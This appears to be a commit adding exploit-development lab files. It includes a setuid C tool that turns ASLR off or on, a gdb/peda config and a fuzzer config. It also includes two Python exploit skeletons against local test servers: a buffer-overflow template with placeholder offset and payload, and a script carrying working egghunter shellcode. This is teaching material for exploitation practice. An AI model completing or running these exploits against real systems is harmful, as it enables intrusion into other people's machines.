Add files via upload

This commit is contained in:
Omar Santos 2022-02-21 11:25:45 -05:00 committed by GitHub
parent 0940710459
commit f7f9524190
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
8 changed files with 115 additions and 0 deletions

Binary file not shown.

View file

@ -0,0 +1,29 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
FILE *fp;
char buff[100];
if(seteuid(0) == -1) {
fprintf(stderr, "Failed to set UID to root - is this binary setuid root?\n");
return -1;
}
if(argc != 2 || (strcmp(argv[1], "0") != 0 && strcmp(argv[1], "2") != 0)) {
fprintf(stderr, "Usage: %s [0 or 2]\nSets randomize_va_space to 0 (ASLR off) or 2 (ASLR on)\n", argv[0]);
return -1;
}
fp = fopen("/proc/sys/kernel/randomize_va_space", "w");
fprintf(fp, "%s\n", argv[1]);
fclose(fp);
fp = fopen("/proc/sys/kernel/randomize_va_space", "r");
fgets(buff, 99, fp);
fclose(fp);
printf("randomize_va_space is now %s", buff);
return 0;
}

Binary file not shown.

View file

@ -0,0 +1,4 @@
source /root/s5/archive/peda-master/peda.py
set disassembly-flavor intel
set follow-fork-mode parent
#source /root/.gdbinit-gef.py

View file

@ -0,0 +1,13 @@
outbound fuzz 'POST /arbitrarydataarbitrarydataarbitrarydataarbitrarydata\r\n\r\n\n'
# String to match in the response
inbound '404'
# What port the fuzzer tries to connect to
port 8080
# What protocol to use
proto tcp
# How long to wait on a response
receiveTimeout 1
# How long to wait between retrying test cases
failureTimeout 5
# Number of times to retry a test case
failureThreshold 3

Binary file not shown.

View file

@ -0,0 +1,26 @@
import socket
import sys
import threading
import struct
IP = "127.0.0.1"
PORT=8080
jmpesp = ????
offset = ????
buf = ????
payload = ????
payload = "POST %s\r\n\r\n" % payload
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(2)
sock.connect((IP,PORT))
sock.send(payload)
print "Buffer sent! (len %d)" % len(payload)
try:
print sock.recv(4096)
print "No crash...."
except:
print "Server died, Yayyyy!!"

View file

@ -0,0 +1,43 @@
#!/usr/bin/python
import os
import socket
import sys
import threading
import struct
import time
HOST="127.0.0.1"
PORT=2501
# Matt Miller Access() egghunter, triggers on "W00TW00T"
egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
egghunterPayload = ?
msgPayload = ?
# Connect one user
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect((HOST, PORT))
sock1.send("usr1\r\n")
sock1.recv(1024)
print "Connected first user"
# Connect a second user and message the first with the egg
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock2.connect((HOST, PORT))
sock2.send("usr2\r\n")
sock2.recv(1024)
time.sleep(1)
print "Connected second user"
sock2.send(msgPayload)
print "Sent msg payload"
# Connect a final user to trigger egghunter in username
sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock3.connect((HOST, PORT))
sock3.send(egghunterPayload)
print "Sent egghunter payload"
# Close down
sock3.close()
sock2.close()
sock1.close()